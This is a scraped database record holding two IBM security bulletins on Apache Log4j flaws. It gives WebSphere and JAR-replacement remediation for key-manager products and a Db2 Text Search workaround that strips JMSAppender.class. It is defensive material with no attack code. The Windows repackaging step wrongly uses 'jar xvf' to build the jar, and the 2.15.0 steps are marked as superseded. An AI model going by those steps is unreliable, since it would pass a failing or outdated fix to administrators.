\n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \u200b\u200b\u200b.\u200b\u200b\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n** Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n** **\n\n** **\n\n** ****Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T23:33:34", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This bulletin covers the vulnerability caused when using versions of log4j earlier than 2.0. This version of the library is used by the ECM (Text Search) feature . CVE-2021-44228 is addressing a critical vulnerability in 2.0 &lt;= log4j &lt;= 2.15.0. covered in a separate security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe ECM (Text Search Server) feature in all fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 for all server editions on all platforms are affected. \n\nIBM Db2 V10.1 and V9.7 are not affected.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V10.5 FP11, V11.1.4 FP6, V11.5.6, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nFor ECM (Text Search Server)\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV10.5| TBD| [IT39390](<https://www.ibm.com/support/pages/apar/IT39390> \"IT39390\" )| Special Build for V10.5 FP11: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-aix64-universal_fixpack-10.5.0.11-FP011%3A316242174097101888&includeSupersedes=0> \"AIX 64-bit\" ) \n[HP-UX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-hpipf64-universal_fixpack-10.5.0.11-FP011%3A242482463941196672&includeSupersedes=0> \"HP-UX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-linuxia32-client-10.5.0.11-FP011%3A438028792052427520&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxx64-universal_fixpack-10.5.0.11-FP011%3A577009839975281408&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 big endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64-universal_fixpack-10.5.0.11-FP011%3A471210663573115712&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 big endian\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linuxppc64le-universal_fixpack-10.5.0.11-FP011%3A775057095159355904&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-linux390x64-universal_fixpack-10.5.0.11-FP011%3A600976767882452608&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sun64-universal_fixpack-10.5.0.11-FP011%3A994737637526172160&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Solaris 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-sunamd64-universal_fixpack-10.5.0.11-FP011%3A161651527260272768&includeSupersedes=0> \"Solaris 64-bit, x86-64\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41021_DSClients-nt32-client-10.5.1100.2866-FP011%3A170657316208346784&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-ntx64-universal_fixpack-10.5.1100.2866-FP011%3A230362976060813344&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n[Inspur](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41021_DB2-inspurkux64-universal_fixpack-10.5.0.11-FP011%3A512422001972300608&includeSupersedes=0> \"Inspur\" ) \n \nV11.1| TBD| [IT39387](<https://www.ibm.com/support/pages/apar/IT39387> \"IT39387\" )| Special Build for V11.1.4 FP6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-aix64-universal_fixpack-11.1.4.6-FP006%3A259848826141273472&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-linuxia32-client-11.1.4.6-FP006%3A800049365576409728&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxx64-universal_fixpack-11.1.4.6-FP006%3A973220600195816448&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linuxppc64le-universal_fixpack-11.1.4.6-FP006%3A840967649574282368&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-linux390x64-universal_fixpack-11.1.4.6-FP006%3A914289956995017856&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Solaris 64-bit, SPARC](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-sun64-universal_fixpack-11.1.4.6-FP006%3A248714336279646784&includeSupersedes=0> \"Solaris 64-bit, SPARC\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_41025_DSClients-nt32-client-11.1.4060.1324-FP006%3A435396118409714368&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_41025_DB2-ntx64-universal_fixpack-11.1.4060.1324-FP006%3A887641715424039424&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A830387863039344000&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.6 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nV11.5| TBD| [IT39389](<https://www.ibm.com/support/pages/apar/IT39389> \"IT39389\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" )\n\nNote: The 11.5.7 special builds here are the same ones supplied for resolving CVE-2021-44228 \n \nIf you are using Db2 Text Search with rich text filters, after these special builds are applied, you will be required to upgrade your version of rich text filters in addition to Db2 Text search. Appropriate rich text filters (in this case version 8.5.5) for each Db2 release can be downloaded from the Db2 accessories suite page.\n\nFor details, see [here](<https://www.ibm.com/support/pages/node/6527760> \"here\" ).\n\nFor Install (Installation Manager)\n\nWe recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nIt was determined through further investigation that while Installation Manager was found to not be impacted by CVE-2021-4104, as the Installation Manager does not use log4j in a manner that exposes the vulnerability, it does include the older version of the library. \n\nFor v11.1.x, install the Db2 fix listed in the table above for Linux 32-bit, Linux 63-bit, Windows 32-bit and/or Windows 64-bit. This fix replaces the existing log4j jar file with an empty jar file. While the vulnerability is mitigated with this fix, a scan will still show the existence of the jar file. Alternatively you may download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\nFor earlier versions, we recommend that you download and install the fix found [here](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Installation+Manager&release=1.9.1.6&platform=Linux&function=all> \"here\" ) to upgrade to the latest version of Installation Manager (IM 1.9.2 or greater).\n\n## Workarounds and Mitigations\n\nFor ECM (Text Search): \n\n\nThe vulnerable jar can be patched to mitigate the vulnerability. \nNote: Do not issue START/STOP Db2 text search server if Db2 text search is not configured.\n\nOn Linux and Unix:\n\nStop the TextSearch server: \"db2ts stop for text\".\n\nRemove the JMSAppender.class file via two options: \nHere is the command:\n \n \n zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class\n \n\nIf you do not have access to 'zip', you can also use the 'jar' command.\n \n \n #assume log4j-1.2.17.jar exists in current directory\n mkdir tmp\n cd tmp\n jar xvf ../log4j-1.2.17.jar\n rm org/apache/log4j/net/JMSAppender.class\n jar cvf ../log4j-1.2.17-patched.jar .\n cd .. \n rm log4j-1.2.17.jar \n ln -s log4j-1.2.17-patched.jar log4j-1.2.17.jar\n rm -rf tmp \n \n\nStart the TextSearch server: \"db2ts start for text\".\n\nOn Windows the Java jar tool with CMD can be used to follow the similar Unix instructions when using jar.\n \n \n Stop the TextSearch server: \"db2ts stop for text\" in the Db2 command line.\n Start the Windows CMD program and go to the SQLLIB\\db2tss\\lib directory which is found in the installation path e.g. \"cd C:\\ProgramFiles\\IBM\\SQLLIB\\db2tss\\lib\"\n Make a copy of the log4j-1.2.17.jar file e.g. \"cp log4j-1.2.17.jar log4j-1.2.17.jar.bak\"\n Make a new directory e.g. \"mkdir tmp\"\n Change to the new directory e.g. \"cd tmp\"\n Extract the jar file using the jar program found in the JDK that is in the SQLLIB\\java path e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17.jar\"\n Delete the JMSAppender.class file e.g. \"del org\\apache\\log4j\\net\\JMSAppender.class\"\n Package the files back into the jar e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17-patched.jar .\"\n Replace the log4j-1.2.17.jar with log4j-1.2.17-patched.jar. e.g. \"cd ..\", \"del log4j-1.2.17.jar\", \"ren log4j-1.2.17-patched.jar log4j-1.2.17.jar\".\n Cleanup the \"tmp\" folder.\n Start the TextSearch server: \"db2ts start for text\" in the Db2 command line. \n \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Added 10.5 links for Windows 64-bit and Windows 32-bit fix packs. \n31 Dec 2021: Added 10.5 links for AIX 64-bit, Linux 32-bit and Linux 64-bit fix packs. \n29 Dec 2021: Added 11.1.4.6 links for Windows 32-bit and Solaris 64-bit fix packs \n28 Dec 2021: Updated ECM Text Search section to reflect that: text search server should not be stopped or started if the customer is not using text search, and added the instructions to copy the patched jar in place of the original.24 Dec 2021: Removed Install section as impacted as further investigation determined that Installation Manager was not affected by this vulnerability, thus Db2 is not vulnerable from that dependency. Added 11.1.4.6 link for Windows 64-bit fix pack \n22 Dec 2021: Added 10.5 link for Inspur. Clarified server and client impact for each issue \n21 Dec 2021: Added 11.5.6 links for Windows 32-bit and Windows 64-bit fix packs. Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \n21 Dec 2021: Updated note that the 11.5.6 builds are the same as the one for CVE-2021-44228. Updated description of Db2 Text Search update. \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY 